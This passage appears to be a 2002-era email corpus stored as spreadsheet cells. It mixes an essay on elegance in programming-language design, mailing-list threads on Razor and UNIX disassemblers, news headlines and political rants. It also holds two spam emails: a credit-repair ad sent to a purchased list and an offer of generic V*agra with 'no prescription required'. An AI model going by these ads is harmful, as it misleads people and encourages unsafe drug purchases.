 or dilettantes), and so forth. As can be seen from the historical remarks in my Principles, social factors are
 frequently more important than scientific factors in determining the success or failure of a programming
 language. 
 Often economic issues can be quantified in terms of money, but the monetary values of costs and benefits are
 often
 unstable and unpredictable because they depend on changing market forces. Also, many social issues, from
 dissatisfaction with poorly designed software to human misery resulting from system failures, are inaccurately
 represented by the single dimension of monetary cost. All kinds of ``cost'' and ``benefit'' must be considered
 in
 seeking an economical design. 
 Elegance Symbolizes Good Design
 ``Elegance? Who cares about elegance?'' snorts the hard-nosed engineer, but Billington shows clearly the
 critical
 role of elegance in ``hard-nosed'' engineering. 
 For the Designer
 It is well-known that feature interaction poses a serious problem for language designers because of the
 difficulty
 of analyzing all the possible interactions of features in a language (see my Principles for examples).
 Structural
 engineers face similar problems of analytic complexity, but Billington observes that the best designers don't
 make
 extensive use of computer models and calculation. 
 One reason is that mathematical analysis is always incomplete. The engineer must make a decision about which
 variables are significant and which are not, and an analysis may lead to incorrect conclusions if this
 decision is not
 made well. Also, equations are often simplified (e.g., made linear) to make their analysis feasible, and this
 is
 another potential source of error. Because of these limitations, engineers that depend on mathematical
 analysis
 may overdesign a structure to compensate for unforeseen effects left out of the analysis. Thus the price of
 safety is
 additional material and increased cost (i.e. decreased efficiency and economy). 
 Similarly in programming language design, the limitations of the analytic approach often force us to make a
 choice between an under-engineered design, in which we run the risk of unanticipated interactions, and an
 over-engineered design, in which we have confidence, but which is inefficient or uneconomical. 
 Many people have seen the famous film of the collapse in 1940 of the four-month-old Tacoma Narrows bridge; it
 vibrated itself to pieces in a storm because aerodynamical stability had not been considered in its design.
 Billington explains that this accident, along with a number of less dramatic bridge failures, was a
 consequence of
 an increasing use of theoretical analyses that began in the 1920s. However, the very problem that destroyed
 the
 Tacoma Narrows bridge had been anticipated and avoided a century before by bridge designers who were guided
 by aesthetic principles. 
 According to Billington, the best structural engineers do not rely on mathematical analysis (although they do
 not
 abandon it altogether). Rather, their design activity is guided by a sense of elegance. This is because
 solutions to
 structural engineering problems are usually greatly underdetermined, that is, there are many possible
 solutions to a
 particular problem, such as bridging a particular river. Therefore, expert designers restrict their attention
 to
 designs in which the interaction of the forces is easy to see. The design looks unbalanced if the forces are
 unbalanced, and the design looks stable if it is stable. 
 The general principle is that designs that look good will also be good, and therefore the design process can
 be
 guided by aesthetics without extensive (but incomplete) mathematical analysis. Billington expresses this idea
 by
 inverting the old architectural maxim and asserting that, in structural design, function follows form. He adds
 (p.
 21), ``When the form is well chosen, its analysis becomes astoundingly simple.'' In other words, the choice of
 form is open and free, so we should pick forms where elegant design expresses good design (i.e. efficient and
 economical design). If we do so, then we can let aesthetics guide design. 
 The same applies to programming language design. By restricting our attention to designs in which the
 interaction
 of features is manifest - in which good interactions look good, and bad interactions look bad - we can let our
 aesthetic sense guide our design and we can be much more confident that we have a good design, without having
 to
 check all the possible interactions. 
 For the User
 In this case, what's good for the designer also is good for the user. Nobody is comfortable crossing a bridge
 that
 looks like it will collapse at any moment, and nobody is comfortable using a programming language in which
 features may ``explode'' if combined in the wrong way. The manifest balance of forces in a well-designed
 bridge
 gives us confidence when we cross it. So also, the manifestly good design of our programming language should
 reinforce our confidence when we program in it, because we have (well-justified) confidence in the
 consequences
 of our actions. 
 We accomplish little by covering an unbalanced structure in a beautiful facade. When the bridge is unable to
 sustain the load for which it was designed, and collapses, it won't much matter that it was beautiful on the
 outside.
 So also in programming languages. If the elegance is only superficial, that is, if it is not the manifestation
 of a
 deep coherence in the design, then programmers will quickly see through the illusion and loose their
 (unwarranted)
 confidence. 
 In summary, good designers choose to work in a region of the design space where good designs look good. As a
 consequence, these designers can rely on their aesthetic sense, as can the users of the structures (bridges or
 programming languages) they design. We may miss out on some good designs this way, but they are of limited
 value unless both the designer and the user can be confident that they are good designs. We may summarize the
 preceding discussion in a maxim analogous to those in my Principles of Programming Languages: 
                                 The Elegance Principle
               Confine your attention to designs that look good because they are good. 
 The Programming Language as Work Environment
 There are other reasons that elegance is relevant to a well-engineered programming language. The programming
 language is something the professional programmer will live with - even live in. It should feel comfortable
 and
 safe, like a well-designed home or office; in this way it can contribute to the quality of the activities that
 take
 place within it. Would you work better in an oriental garden or a sweatshop? 
 A programming language should be a joy to use. This will encourage its use and decrease the programmer's
 fatigue
 and frustration. The programming language should not be a hindrance, but should serve more as a collaborator,
 encouraging programmers to do their jobs better. As some automobiles are ``driving machines'' and work as a
 natural extension of the driver, so a programming language should be a ``programming machine'' by encouraging
 the programmer to acquire the smooth competence and seemingly effortless skill of a virtuoso. The programming
 language should invite the programmer to design elegant, efficient and economical programs. 
 Through its aesthetic dimension a programming language symbolizes many values. For example, in the variety of
 its features it may symbolize profligate excess, sparing economy or asceticism; the kind of its features may
 represent intellectual sophistication, down-to-earth practicality or ignorant crudeness. Thus a programming
 language can promote a set of values. By embodying certain values, it encourages us to think about them; by
 neglecting or negating other values, it allows them to recede into the background and out of our attention.
 Out of
 sight, out of mind. 
 Acquiring a Sense of Elegance
 Aesthetics is notoriously difficult to teach, so you may wonder how you are supposed to acquire that refined
 sense
 of elegance necessary to good design. Billington observes that this sense is acquired through extensive
 experience
 in design, which, especially in Europe, is encouraged by a competitive process for choosing bridge designers.
 Because of it, structural engineers design many more bridges than they build, and they learn from each
 competition they loose by comparing their own designs with those of the winner and other losers. The public
 also
 critiques the competing designs, and in this way becomes more educated; their sense of elegance develops along
 with that of the designers. 
 So also, to improve as a programming language designer you should design many languages - design obsessively -
 and criticize, revise and discard your designs. You should also evaluate and criticize other people's designs
 and try
 to improve them. In this way you will acquire the body of experience you will need when the ``real thing''
 comes
 along. 
 References
    1.Billington, David P., The Tower and the Bridge: The New Art of Structural Engineering, Princeton:
      Princeton University Press, 1983. Chapters 1 and 6 are the most relevant. 
    2.MacLennan, Bruce J., Principles of Programming Languages: Design, Evaluation, and Implementation,
      second edition, New York: Holt, Rinehart &amp; Winston (now Oxford University Press), 1987.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
 On Wed, 4 Sep 2002, Yannick Gingras wrote:
 &gt; BTW thanks for all of you who provided interestiong insight.  I'm playing with 
 &gt; gdb's dissassembler now but I don't think it's what a typical cracker would 
 &gt; use.  Any hints on UNIX cracking tools ?
 There's also an 'objdump' program, and 'biew' hex viewer/disassembler. A good 
 starting point to search is http://www.freshmeat.net/
 However, cracking and reverse engineering tools are not so ubiquitous on UNIX as 
 they are on Windows platform for two main reasons:
 1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...) are 
 respectable companies. They are ready to pay big bucks for software they need: the reputation matters.
 2. Most software for free and open source Unices like Linux and xBSD (this 
 software often may be used on commercial unices as well) is, well, free and 
 open source.
 Regards
 /Artem
 -- 
  Artem Frolov &lt;frolov@ispras.ru&gt;
 /------------------------------------------------------------------\
  Software Engineer, System Administrator                       
  Institute for System Programming, Russian Academy of Sciences     
  Tel. +7 095 912-5317 (ext 4406), Cellular: +7 095 768-7067
  C7 40 CA 41 2A 18 89 D6  29 45 DF 50 75 13 6D 7A  A4 87 2B 76
 \------------------------------------------------------------------/
 ------------------------------------------------------------------
 Basic Definitions of Science:
 	If it's green or wiggles, it's biology.
 	If it stinks, it's chemistry.
 	If it doesn't work, it's physics.
 ------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] log problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Or, you could do this. &lt;G&gt;
 On Mon, 9 Sep 2002, David Rees wrote:
 &gt; On Mon, Sep 09, 2002 at 05:10:23PM -0400, Rob wrote:
 &gt; &gt; I just set up razor and spamassassin, but I keep getting this error in my 
 &gt; &gt; mail log file
 &gt; &gt; 
 &gt; &gt; razor2 check skipped: No such file or directory Can't call method "log" on 
 &gt; &gt; unblessed reference at 
 &gt; &gt; /usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.
 &gt; &gt; 
 &gt; &gt; I have looked through the archived list and the only thing I have seen 
 &gt; &gt; about this error is a possible permission problem on the log file.
 &gt; 
 &gt; Yeah, the answer isn't here in this list, it's on the spamassassin-users
 &gt; list.  I just asked it late last week.
 &gt; 
 &gt; Hint:  Add -H to the spamd startup flags using the latest version of
 &gt; spamassassin.
 &gt; 
 &gt; -Dave
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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Asteroids anyone ?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; Another one fizzles out...
 You sound disappointed.  Don't worry, there will be lots more.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Re: Questions on miscellaneous errata and issues
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 &gt; Date: Mon, 12 Aug 2002 18:23:34 -0700
 &gt; From: Chad Norwood &lt;chad@cloudmark.com&gt;
 &gt; To: Sven &lt;sven@dmv.com&gt;
 &gt; Cc: razor-users@example.sourceforge.net
 &gt; Subject: [Razor-users] Re: Questions on miscellaneous errata and issues
 &gt;
 &gt; On 09/08/02 20:49 -0400, Sven wrote:
 &gt; ) In tweaking my system to try to optimize the use of razor (this now from
 a network/connection/etc standpoint, not so much from a philosphical stance
 on what is or is not considered spam and who should decide it) I have come
 across a couple issues that I hope I may be able to get some relief on ...
 &gt; )
 &gt; ) 1) What *exactly* does "Unable to connect to honor.cloudmark.com:2703;
 Reason: Operation now in progress." mean ??? I have seen this error message
 some 1700 times today (between 2 clustered servers) representing a little
 over 1% failure rate. In an enterprise level I was hoping for more along the
 lines of maybe one-tenth that .....
 &gt;
 &gt;   It's a network error - That string is not created by
 &gt;   Razor Agents.  Its trying to connect and having trouble.
 &gt;   1700 times seems abnormally high.  How many successful
 &gt;   connections were there in the same timespan?
 &gt;
 Today was not as bad ... apt.cloudmark was the server du jour and
 experienced about 800 "Unable to connect .... Reason: Operation now in
 progress" out of some 189,000 "bootup[1]"  or roughly 0.5% -- better than
 the 1% before but still a bit higher than I would like. I suspect it is
 because a previous timeout from razor-agents has a process id that is being
 held by an open milter socket. The process id's cycle, the number comes up
 again and the error occurs as a duplicate pid occurs. I will tweak my milter
 settings to shorten the total time to allow the socket to live per connect.
 &gt;
 &gt; ) 2) Related somewhat to question 1: is there (or will there be if
 currently not) a way of adjusting the timeout the setting for the
 razor-check to await a response from the server it queries? I am running
 this as a sendmail milter and adjusting the milter timeouts won't help if
 the razor-check script times out first anyway ....
 &gt;
 &gt;   The timeout is hardcoded to 15 secs.
 &gt;   No plans right now to make that an option.
 &gt;   You can always edit the source - Core.pm.  :)
 In looking at Core.pm I find a couple possible places where that code might
 be. Is it:
     my $select = new IO::Select ($sock);
     my @handles = $select-&gt;can_read (15);
     if ($handles[0]) {
         $self-&gt;log (8,"Connection established");
         my $greeting = &lt;$sock&gt;;
         # $sock-&gt;autoflush; # this is on by default as of IO::Socket 1.18
         $self-&gt;{sock} = $sock;
         $self-&gt;{connected_to} = $server;
         $self-&gt;{select} = $select;
         $self-&gt;log(4,"$server &gt;&gt; ". length($greeting) ." server greeting:
 $greeting");
         return 1 if $params{discovery_server};
         unless ($self-&gt;parse_greeting($greeting) ) {
             $self-&gt;nextserver or return $self-&gt;errprefix("connect2");
             return $self-&gt;connect;
         }
         return 1;
     } else {
         $self-&gt;log (3, "Timed out (15 sec) while reading from
 $self-&gt;{s}-&gt;{ip}.");
 ??????
 or
     unless ($sock) {
         $sock = IO::Socket::INET-&gt;new(
                             PeerAddr =&gt; $server,
                             PeerPort =&gt; $port,
                             Proto    =&gt; 'tcp',
                             Timeout  =&gt; 20,
                      );
         unless ( $sock ) {
             $self-&gt;log (3,"Unable to connect to $server:$port; Reason:
 $!.");
             return if $params{discovery_server};
             $self-&gt;nextserver or return $self-&gt;errprefix("connect1");
             return $self-&gt;connect;
         }
     }
 ??????
 [of course the latter reflects a differenct timeout setting altogether - one
 part for proxy, the other for non-proxy]
 &gt;
 &gt;
 &gt; ) 3) What are the plans for fire.cloudmark, apt.cloudmark, ubik.cloudmark?
 It seems that we have all these catalogue servers yet a good portion of the
 time, only one is available or the last discovery ends up only listing one
 (currently honor.cloudmark) in the cataloge.lst file.
 &gt;
 &gt;   The system is designed so servers can be added and
 &gt;   subtracted without the clients caring - if the razor
 &gt;   client can't connect to a server, it re-discovers, getting
 &gt;   all currently available servers and stores results locally.
 &gt;
 I changed the default discovery period to every 12 hours in order to
 compensate for the recent sporadic nature of the servers' availability (I
 realize that the issue was related to syncing and server upgrades .... but I
 might as well play it safe for a while).
 &gt;
 &gt; ) 4) What would be the implications/requirements/caveats of hosting a
 catalogue server or, at the minimum, a caching server (similar to the way
 mail-abuse.org, for example, does dns zone transfers of its rbl list -- I
 realize that this is a completely different mechanism, but you get the point
 I am driving at here). I realize that there is an issue of polluting the
 catalogue but perhpas there could be some way of certifying a catalogue
 server? What type of bandwidth considerations are we looking at here? (It is
 just the signatures that are actually transferred across the pipes, is it
 not?)
 &gt;
 &gt;   We are looking into releasing caching catalogue servers
 &gt;   for those besides us to use.
 If I can be of help or if you have details about to participate in this
 portion (caching or catalogueing), please let me know.
 &gt;
 &gt;
 &gt; ) It really looks like there is a great potential here for a very workable
 tool and if I can get some of these issues addressed or can even be of some
 assistance, all the better .....
 &gt; )
 &gt; ) Sven Willenberger
 &gt; ) Systems Administration
 &gt; ) Delmarva Online, Inc.
 &gt;
 &gt;
 &gt;   Thanks!
 &gt;
 &gt;   -chad
 &gt;
 &gt;
 &gt;
 &gt; --__--__--
 &gt;
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;
 &gt;
 &gt; End of Razor-users Digest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</si>
  <si>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Fw: Keep it under wraps, but this one works a treat!            ADGHRVIKMM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.pakoa.com/creditfix/email/background_arrow.gif WIDTH=3D4=
 00&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.pakoa.com/creditfix/?cid=3D1580&amp;mid=3D17600&gt;&lt;IMG =
 SRC=3Dhttp://365.pakoa.com/creditfix/email/banner_email.gif BORDER=3D0&gt;&lt;/A=
 &gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.pakoa.com/creditfix/?cid=3D1580&amp;mid=3D17600&gt;&lt;img src=3D=
 http://365.pakoa.com/creditfix/email/body_email.gif alt=3D"" border=3D"0"&gt;=
 &lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1580-17600.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Tuesday July 23
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.
 Software
     Ex-Microserf Schmidt as govt cyberterror Cassandra
     Apocalypse soon
         http://www.theregister.co.uk/content/4/26317.html
     Bruce Perens on Real's Open Source gambit
     Media Frenzy
         http://www.theregister.co.uk/content/4/26314.html
     Fingerprinting of UK school kids causes outcry
     Prison-style fingerprint checking technology replaces library cards, or What Big Brother did next
         http://www.theregister.co.uk/content/4/26305.html
     MS planning to tackle leaked WinXP keys with SP1?
     Mass zeroing of corporate keys mooted
         http://www.theregister.co.uk/content/4/26301.html
 Personal Hardware
     Microsoft's Canary phone - the first pics
     What a Stinker!
         http://www.theregister.co.uk/content/54/26308.html
     We hate our iPAQs
     Very long list of complaints
         http://www.theregister.co.uk/content/54/26304.html
 Internet
     EU intros site, freephone service to solve citizens' problems
     Their internal market problems anyway. Yum...
         http://www.theregister.co.uk/content/6/26312.html
     IETF puts weight behind Advanced Encryption Standard
     Improved secrecy and security, one TLA at a time
         http://www.theregister.co.uk/content/6/26311.html
     Volunteer snoops coming to an ISP near you?
     Operation Cyber-TIPS
         http://www.theregister.co.uk/content/6/26309.html
     Tiscali to launch Excite across Europe
     Ssssshhhh, it's a secret
         http://www.theregister.co.uk/content/6/26302.html
 Net Security
     Ex-Microserf Schmidt as govt cyberterror Cassandra
     Apocalypse soon
         http://www.theregister.co.uk/content/55/26317.html
     Serious PHP vuln reported
     Worse on Sparc than Intel
         http://www.theregister.co.uk/content/55/26316.html
     Symantec's SecurityFocus buyout met with pessimism
     Bug trackers fear BugTraq death
         http://www.theregister.co.uk/content/55/26315.html
     IETF puts weight behind Advanced Encryption Standard
     Improved secrecy and security, one TLA at a time
         http://www.theregister.co.uk/content/55/26311.html
 Business
     EDS rejects WorldCom accounting allegations
     'Unfounded'
         http://www.theregister.co.uk/content/7/26306.html
     Hopes of PC market recovery dashed
     Dell close to overtaking HP in becalmed sector
         http://www.theregister.co.uk/content/7/26303.html
     WorldCom dives for Chapter 11 cover
     No surprises there
         http://www.theregister.co.uk/content/7/26300.html
     ARM plans to charge options against profits
     UK market's first 'we're not Enron, oh no sir' move
         http://www.theregister.co.uk/content/7/26299.html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</si>
  <si>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Subject: Shooting from the Hip: An Interview with Hip Tanaka
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613662,159/
 Date: 2002-10-06T18:12:58+01:00
 In 1986, we in the U.S. were playing the Nintendo Entertainment System (known 
 as the Famicom in Japan), and roughly a third of the music for its first set of 
 games was written by Hirokazu "Hip" Tanaka, then with Nintendo Co. Ltd.He has 
 written music for countless other games as well as designing the Game Boy 
 Camera and Printer, and also scored the soundtrack to the Pokemon TV series. 
 Alexander Brandon catches up with the legendary composer.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'I am an enemy of your country'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572778,215/
 Date: 2002-10-05T03:05:36+01:00
 Briton Richard Reid pleads guilty to attempting to blow up flight.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: First Time Generic V*agra under $3 per 50mg
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --NS_MAIL_Boundary_07132002
 Content-Type: text/html
 &lt;body BGCOLOR="WHITE" TEXT="teal" VLINK="teal" &gt;&lt;center&gt;
 &lt;table WIDTH=450 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;tr&gt;&lt;td&gt;&lt;font SIZE=-2
 COLOR="COCOCO" FACE="Verdana,Arial"&gt;&lt;/font&gt;
 &lt;table BGCOLOR="FFFFFF" BORDER=0 WIDTH=450 ALIGN="CENTER"&gt;&lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font SIZE=-0 COLOR="blue" FACE="Verdana,Arial"&gt;Generic V*AGRA -
 $3 per 50mg - Generic V*AGRA&lt;/font&gt;&lt;br&gt;&lt;a
 HREF="http://www.web-mail.tv/silagra/"  TARGET="_new"&gt;&lt;img SRC="http://www.web-mail.tv/silagra/silagra.jpg"
 ALIGN="top" BORDER=0&gt;&lt;/font&gt;&lt;br&gt;&lt;font SIZE=-1 COLOR="Blue"
 FACE="Verdana,Arial"&gt;Only The Price &amp; The Packaging is
 Different&lt;/font&gt;&lt;br&gt;&lt;p&gt;&lt;/a&gt;&lt;/center&gt;&lt;/p&gt;&lt;/font&gt;&lt;/center&gt;&lt;font SIZE=-1 COLOR="teal" FACE="Verdana,Arial"&gt;&lt;ul
 TYPE="square"&gt;&lt;p ALIGN="justify"&gt;&lt;li&gt; Shipping &amp; Handling - &lt;font SIZE=-1 COLOR="red"
 FACE="Verdana,Arial"&gt;FREE&lt;/font&gt;&lt;/li&gt;&lt;/p&gt;&lt;p ALIGN="justify"&gt;&lt;li&gt; NO Prescription
 Required for shipping.&lt;/li&gt;&lt;/p&gt;&lt;p ALIGN="justify"&gt;&lt;li&gt; NO Consultation
 Fee.&lt;/li&gt;&lt;/p&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;&lt;/table&gt;&lt;hr&gt;
 &lt;p ALIGN="justify"&gt;&lt;font SIZE=-2 COLOR="black" FACE="Verdana,Arial"&gt;
 &lt;p ALIGN="justify"&gt;If you do not  wish to receive mail from us please
 follow &lt;a HREF="http://www.web-mail.tv/cgi-bin/remove.cgi"&gt;&lt;font SIZE=-2
 COLOR="black" FACE="Verdana,Arial"&gt;this link&lt;/font&gt;&lt;/a&gt; for removal and we will ensure
 that you never receive email from our system again. &lt;/p&gt;
 We apologise for any inconvenience we may have caused you.&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;
 --NS_MAIL_Boundary_07132002--
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 23 Aug 2002 02:05:19 +0700
     From:        Robert Elz &lt;kre@munnari.oz.au&gt;
     Message-ID:  &lt;16323.1030043119@munnari.OZ.AU&gt;
 When I said ...
   | This is from today's cvs
 that will translate as  "yesterday's" now of course (before the most
 recent set of changes (catchup speedups, and so on)).
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Gnome 2
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-19 at 09:09, Jesse Keating wrote:
 &gt; And you think a batch of gnome2 rpms is going to solve that?
 &gt; (no offense)
 Not quite, but if I got gnome2 installed, then my guess is that gtk2
 would also be fully installed, which would let me use the new pan.
 That and I'd like to try gnome2 anyway.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Family refuses to cancel expensive wedding just because the groom
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8406748,1717/
 Date: 2002-09-30T20:19:09+01:00
 (Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hire a really talented skywriter to doodle nudie pics in the sky and see
 if they figure out what to charge you with. Exactly how far into the sky
 does the border of your local district reach?
 &gt; &gt; If the creator didnt say you could have it without paying, it's theft,
 &gt; &gt; so simple, hell that's even in all the major holy books.
 &gt;
 &gt; Wow, I've got a great idea!  I'll hire a skywriter to write "you can't
 &gt; look at this without paying," then lock up everybody who looked at it
 &gt; and didn't pay!  It can't fail -- Jesus is on my side!
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Nasty party' warning to Tories
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655708,215/
 Date: 2002-10-08T03:30:58+01:00
 *Politics: *The Conservative leadership yesterday launched itself into a frenzy 
 of self-reproach as it struggled to shed the image of Britain's "nasty party".
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: USA USA WE ARE NUMBER ....six.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 26 Jul 2002, Ian Andrew Bell wrote:
 --]Being smart, for example, has made Stephen Hawking famous and
 --]respected, but he's not particularly rich.
 Bang, you fell right into the trap of Sematic Siezerdom.
 RICH is a word of many contexts. You can be RICh in wealth, ie raw money,
 you can be Rich in Wisdom, ala Hawkins, You can be rich with freinds, you
 can be Rich in emotions........
 --]all accounts a complete moron.  In fact, spend a weekend in Beverly
 --]Hills and you will encounter vast numbers of people who are
 --]profoundly stupid driving Rolls Royces and shopping at PRADA.
 MOney Rich versus Mental Rich....Equality amongst differnt grains...Why do
 folks still fall into this trap?
 --]The working class IS the market and the working class IS where
 --]wealth is created.
 In the current ecomony Wealth is created only in TRANPORT of wealth, that
 is in moving the micro welath of the masses to to macro wealth of the few.
 100 million people making phone calls a day that net you 1$ per call makes
 you a 100millionaire per day (minus operating expenses (real costs of
 physical value as well as the less physical value of lubricant (taxes,
 bribes, payoffs, kickbacks)etc)
 --]And the people draining the hot tub are the folks in the ruling
 --]class -- people like Ken Lay, Dick Cheney, Bernie Ebbers, et al --
 They were put into the rulign cvlass by the mass consess that THEY are
 amrt fellas who can make us feel good about giveing them the power to tell
 us how to live our lives (and thus how to feel about ourselves,how to
 value our worth, how to feel good about being etc etc etc)
 --]So, is the lower caste necessarily stupid for saving money or
 --]investing in retirement plans?  I don't think so.  Are they stupid
 --]for buying clothes and automobiles?  I don't think so.
 They are STUPID in allowing, heck forcing, the few to stand guard over the
 many and then pay for the service of being servants to them.
 --]At the granular level, the notion that "most rich people are rich
 --]because they're smart" is so anecdotal and naive that it's not
 --]worth arguing about, so I won't.  Still, a compelling point worth
 --]some clarification.
 At the grainular level it is simply that Those who can con enough folks
 into giving up thier Choices to a governing body (usualy one they will
 control) wind up with the most concentration of Wealth (money) and
 Power(over others)
 Basicaly we have gone back to being serfs, only we demand nicer hovels.
 WE demand to have paid for a ruling class lord over us, protect us and
 bascialy  build the castle walls stronger to protect us from all enemys of
 the  status quo both forgien and domestic.
 If the constitution were allowed to go up for a vite of confiendnce todayI
 bet it would fall down and go boom.. Too much freedom, too many ways that
 the INdividual is called on to be thier own guardian...too many demands on
 the fraility of human nature...much better to errect protectors, let them
 sort it all out, and tell us what we need to do to be happy.
 Smart in todays society is having enough Welath, Charm, Will, Power,
 Knowing etc to Do What You Want.
 Stupid is living under others rules.
 (to the stupid the smart are "stupid" "look at them, wasting all thier
 time  on that tomfollery" "lords a goshen, aint they the queer ones"
 "would you  look at that, some folks just dont have the sense to fit in")
 The words Smart and Atupid are the wrong ones here... Lets change them to
 Indviduals  and Sheeple
 yea that works better for me.
 tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hanson's Sept 11 message in the National Review
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.nationalreview.com/hanson/hanson091102.asp
 September 11, 2002 8:00 a.m.
 The Wages of September 11
 There is no going back.
 September 11 changed our world. Those who deny such a watershed event take a
 superficially short-term view, and seem to think all is as before simply
 because the sun still rises and sets.
 This is a colossal misjudgment. The collapse of the towers, the crashing
 into the Pentagon, and the murder of 3,000 Americans  all seen live in real
 time by millions the world over  tore off a scab and exposed deep wounds,
 which, if and when they heal, will leave ugly scars for decades. The killers
 dealt in icons  the choice of 911 as the date of death, targeting the
 manifest symbols of global capitalism and American military power, and
 centering their destruction on the largest Jewish city in the world. Yes,
 they got their symbols in spades, but they have no idea that their killing
 has instead become emblematic of changes that they could scarcely imagine.
 Islamic fundamentalism has proved not ascendant, but static, morally
 repugnant  and the worst plague upon the Arab world since the Crusades. By
 lurking in the shadows and killing incrementally through stealth, the
 vampirish terrorists garnered bribes and subsidies through threats and
 bombs; but pale and wrinkled in the daylight after 9/11, they prove only
 ghoulish not fearsome.
 The more the world knows of al Qaeda and bin Laden, the more it has found
 them both vile and yet banal  and so is confident and eager to eradicate
 them and all they stand for. It is one thing to kill innocents, quite
 another to take on the armed might of an aroused United States. Easily
 dodging a solo cruise missile in the vastness of Afghanistan may make good
 theater and bring about braggadocio; dealing with grim American and British
 commandos who have come 7,000 miles for your head prompts abject flight and
 an occasional cheap infomercial on the run. And the ultimate consequence of
